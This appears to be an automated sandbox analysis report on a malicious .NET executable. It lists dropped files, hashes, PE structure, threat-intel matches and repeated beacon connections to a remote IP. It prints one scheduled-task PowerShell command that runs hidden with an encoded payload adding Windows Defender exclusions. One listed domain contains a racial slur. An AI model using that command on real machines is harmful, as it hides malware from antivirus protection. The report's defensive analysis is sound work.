                                                                  12:27:23 | Task Scheduler | Run new task: Product path: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                  12:27:25 | Task Scheduler | Run new task: sgaapu path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                                                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  103.230.121.81 | Filezilla-stage2.exe | malicious | Unknown |

                                                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  iam.nigga.dad | Filezilla-stage2.exe | malicious | Unknown | 103.230.121.81

                                                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                  VPSQUANUS | Filezilla-stage2.exe | malicious | Unknown | 103.230.121.81
                                                                   | rebirth.dbg.elf | malicious | Mirai, Okiru | 103.252.20.25
                                                                   | mips.nn.elf | malicious | Mirai, Okiru | 103.122.177.128
                                                                   | la.bot.arm.elf | malicious | Mirai | 154.91.52.33
                                                                   | file.exe | malicious | XWorm | 103.230.121.124
                                                                   | file.exe | malicious | XWorm | 103.230.121.124
                                                                   | word.exe | malicious | XWorm | 103.230.121.124
                                                                   | svchost.exe | malicious | XWorm | 103.230.121.124
                                                                   | Chrome.exe | malicious | XWorm | 103.230.121.124
                                                                   | Registry.exe | malicious | XWorm | 103.230.121.124
                                                                    No context
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\test.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):604672
                                                                    Entropy (8bit):7.935767129377669
                                                                    Encrypted:false
                                                                    SSDEEP:12288:gwHE6uElwjKPq9qgzUstlouX8mhQH5agMnMOHMLM6:gl6ZiePijt2uM1bf
                                                                    MD5:59EAB4D3E8B7C383D6E963256CE603D8
                                                                    SHA1:367AC5A131BBEBCE102B0FC56C3F22224FE61B47
                                                                    SHA-256:EA8724FF42A52834A9AF9C7D3FE10AC6FF1FE8064E4F1E3E519DAF9396A508F0
                                                                    SHA-512:5B64311AE75D93B2F15452EE6AC9A39DD44BC6BEE2880AFFB6F3E4D7A12B98224595055DD6E44D3BCDB0FF808B0AA8ED9F2097228C5CA43B1094828B796095B0
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.................0..0...........O... ...`....@.. ....................................@.................................`O..K....`..p............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc...p....`.......2..............@..@.reloc...............8..............@..B.................O......H..........d\..........@................................................*...(....*..(....*.Z .J.......%.....(....*..0..........8....... ....o....8...... .V.o ....c F[..a~....{....a(....(....o....8(...s......8N.......o......o....o......8...... B... ..sX 0.mia~....{l...a(....(....o....8.....s......8.....(....u....s......8..........s......8.........o....8......o....s......8.............8.......s......8.......(....&8..........o....&8.........o....8......o......8..........9....
                                                                    Process:C:\Users\user\Desktop\test.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):838
                                                                    Entropy (8bit):5.343981685113983
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzeosXE4qdKm:MxHKlYHKh3oRAHKzePHA
                                                                    MD5:9CCD52F7E666DC3225FA8A6D9120C198
                                                                    SHA1:35571A48C9F29765D69EFD69D95669B1A180BBD9
                                                                    SHA-256:965053376DFF2CDD816C41292E23666E3456504A75254130D620C3C5BB94949D
                                                                    SHA-512:8B66F632EEEF894527CD0EBF331E97E158A40668AC6D290F079449A03477542B609C5FA7AE1E6321093860B11CE697E2D4FECA24ADE51DC94608398B9BC81B54
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..
                                                                    Process:C:\Users\user\Desktop\test.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):838
                                                                    Entropy (8bit):5.343981685113983
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzeosXE4qdKm:MxHKlYHKh3oRAHKzePHA
                                                                    MD5:9CCD52F7E666DC3225FA8A6D9120C198
                                                                    SHA1:35571A48C9F29765D69EFD69D95669B1A180BBD9
                                                                    SHA-256:965053376DFF2CDD816C41292E23666E3456504A75254130D620C3C5BB94949D
                                                                    SHA-512:8B66F632EEEF894527CD0EBF331E97E158A40668AC6D290F079449A03477542B609C5FA7AE1E6321093860B11CE697E2D4FECA24ADE51DC94608398B9BC81B54
                                                                    Malicious:true
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1940658735648508
                                                                    Encrypted:false
                                                                    SSDEEP:3:NlllulVmdtZ:NllUM
                                                                    MD5:013016A37665E1E37F0A3576A8EC8324
                                                                    SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                    SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                    SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                    Malicious:false
                                                                    Preview:@...e................................................@..........
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.935767129377669
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:test.exe
                                                                    File size:604'672 bytes
                                                                    MD5:59eab4d3e8b7c383d6e963256ce603d8
                                                                    SHA1:367ac5a131bbebce102b0fc56c3f22224fe61b47
                                                                    SHA256:ea8724ff42a52834a9af9c7d3fe10ac6ff1fe8064e4f1e3e519daf9396a508f0
                                                                    SHA512:5b64311ae75d93b2f15452ee6ac9a39dd44bc6bee2880affb6f3e4d7a12b98224595055dd6e44d3bcdb0ff808b0aa8ed9f2097228c5ca43b1094828b796095b0
                                                                    SSDEEP:12288:gwHE6uElwjKPq9qgzUstlouX8mhQH5agMnMOHMLM6:gl6ZiePijt2uM1bf
                                                                    TLSH:35D41241B6E3CB44C06942FAD0D394AC0BF9EBC739B7D74D388822461D57BD59E2AB84
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.................0..0...........O... ...`....@.. ....................................@................................
                                                                    Icon Hash:00928e8e8686b000
                                                                    Entrypoint:0x494fae
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0xDFD6F372 [Sat Jan 1 08:23:14 2089 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x94f60 | 0x4b | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x96000 | 0x570 | .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0xc | .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                    .text | 0x2000 | 0x92fb4 | 0x93000 | 878eb235ca56ec53904307a7a0ba29b9 | False | 0.9521301684736394 | data | 7.943479566691634 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc | 0x96000 | 0x570 | 0x600 | b56938426c2a5ec9afaf4e1fb56410d1 | False | 0.4016927083333333 | data | 3.9448791679772106 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc | 0x98000 | 0xc | 0x200 | 165e821f4921a74434c5aed08e93e260 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                    RT_VERSION | 0x960a0 | 0x2e4 | data | | | 0.4283783783783784
                                                                    RT_MANIFEST | 0x96384 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                                    DLL | Import
                                                                    mscoree.dll | _CorExeMain
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Dec 13, 2024 13:27:53.138262033 CET3012049722103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:53.138415098 CET4972230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:53.258625031 CET3012049722103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:54.632690907 CET3012049722103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:54.632761955 CET4972230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:54.632926941 CET4972230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:54.740524054 CET4972330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:54.752789974 CET3012049722103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:54.860655069 CET3012049723103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:54.860797882 CET4972330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:54.861596107 CET4972330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:54.981272936 CET3012049723103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:54.981348991 CET4972330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:55.101141930 CET3012049723103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:56.467823982 CET3012049723103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:56.467889071 CET4972330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:56.468061924 CET4972330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:56.584266901 CET4972430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:56.587889910 CET3012049723103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:56.704498053 CET3012049724103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:56.704665899 CET4972430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:56.705487967 CET4972430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:56.830605030 CET3012049724103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:56.830737114 CET4972430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:56.950746059 CET3012049724103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:58.325464010 CET3012049724103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:58.325980902 CET4972430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:58.325980902 CET4972430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:58.427840948 CET4972530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:58.445945024 CET3012049724103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:58.547518015 CET3012049725103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:58.547665119 CET4972530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:58.548599958 CET4972530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:58.670552015 CET3012049725103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:27:58.670663118 CET4972530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:27:58.790513992 CET3012049725103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:00.161637068 CET3012049725103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:00.161727905 CET4972530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:00.171214104 CET4972530120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:00.289613962 CET4972630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:00.291069031 CET3012049725103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:00.409410000 CET3012049726103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:00.409545898 CET4972630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:00.411000013 CET4972630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:00.530833960 CET3012049726103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:00.530884981 CET4972630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:00.650988102 CET3012049726103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:02.023745060 CET3012049726103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:02.023859024 CET4972630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:02.024275064 CET4972630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:02.131288052 CET4972730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:02.143956900 CET3012049726103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:02.251064062 CET3012049727103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:02.251163006 CET4972730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:02.251837969 CET4972730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:02.372503042 CET3012049727103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:02.372574091 CET4972730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:02.492444992 CET3012049727103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:03.867541075 CET3012049727103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:03.867598057 CET4972730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:03.867757082 CET4972730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:03.974919081 CET4972830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:03.987677097 CET3012049727103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:04.094752073 CET3012049728103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:04.094943047 CET4972830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:04.095686913 CET4972830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:04.215406895 CET3012049728103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:04.218614101 CET4972830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:04.338345051 CET3012049728103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:05.714973927 CET3012049728103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:05.715048075 CET4972830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:05.715271950 CET4972830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:05.818572044 CET4972930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:05.834983110 CET3012049728103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:05.938493967 CET3012049729103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:05.938973904 CET4972930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:05.939367056 CET4972930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:06.059387922 CET3012049729103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:06.059531927 CET4972930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:06.179296017 CET3012049729103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:07.592812061 CET3012049729103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:07.592897892 CET4972930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:07.593127012 CET4972930120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:07.708818913 CET4973030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:07.712785006 CET3012049729103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:07.830416918 CET3012049730103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:07.830601931 CET4973030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:07.831392050 CET4973030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:07.951276064 CET3012049730103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:07.951409101 CET4973030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:08.071393013 CET3012049730103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:09.436928034 CET3012049730103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:09.438611984 CET4973030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:09.438770056 CET4973030120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:09.553175926 CET4973130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:09.558577061 CET3012049730103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:09.672911882 CET3012049731103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:09.674613953 CET4973130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:09.675509930 CET4973130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:09.795288086 CET3012049731103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:09.798639059 CET4973130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:09.918409109 CET3012049731103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:11.278021097 CET3012049731103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:11.280702114 CET4973130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:11.280952930 CET4973130120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:11.396667004 CET4973230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:11.400597095 CET3012049731103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:11.516618967 CET3012049732103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:11.516846895 CET4973230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:11.517659903 CET4973230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:11.637741089 CET3012049732103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:11.638600111 CET4973230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:11.758847952 CET3012049732103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:13.119973898 CET3012049732103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:13.120126009 CET4973230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:13.120295048 CET4973230120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:13.232322931 CET4973330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:13.239996910 CET3012049732103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:13.353614092 CET3012049733103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:13.353713989 CET4973330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:13.379324913 CET4973330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:13.499331951 CET3012049733103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:13.499450922 CET4973330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:13.619210958 CET3012049733103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:15.268946886 CET3012049733103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:15.269062042 CET4973330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:15.269444942 CET4973330120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:15.380825043 CET4973430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:15.389244080 CET3012049733103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:15.500638962 CET3012049734103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:15.500771046 CET4973430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:15.501744032 CET4973430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:15.622910023 CET3012049734103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:15.622965097 CET4973430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:15.742821932 CET3012049734103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:17.111850023 CET3012049734103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:17.111987114 CET4973430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:17.112221956 CET4973430120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:17.224519968 CET4973630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:17.232270002 CET3012049734103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:17.344585896 CET3012049736103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:17.344722033 CET4973630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:17.345577955 CET4973630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:17.465217113 CET3012049736103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:17.465364933 CET4973630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:17.585215092 CET3012049736103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:18.950680971 CET3012049736103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:18.950767040 CET4973630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:18.950953960 CET4973630120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:19.053085089 CET4973730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:19.070645094 CET3012049736103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:19.172919035 CET3012049737103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:19.173122883 CET4973730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:19.173755884 CET4973730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:19.293715000 CET3012049737103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:19.293821096 CET4973730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:19.413558006 CET3012049737103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:20.795066118 CET3012049737103.230.121.81192.168.2.9
                                                                    Dec 13, 2024 13:28:20.795327902 CET4973730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:20.795680046 CET4973730120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:20.913155079 CET4973830120192.168.2.9103.230.121.81
                                                                    Dec 13, 2024 13:28:20.915616989 CET3012049737103.230.121.81192.168.2.9
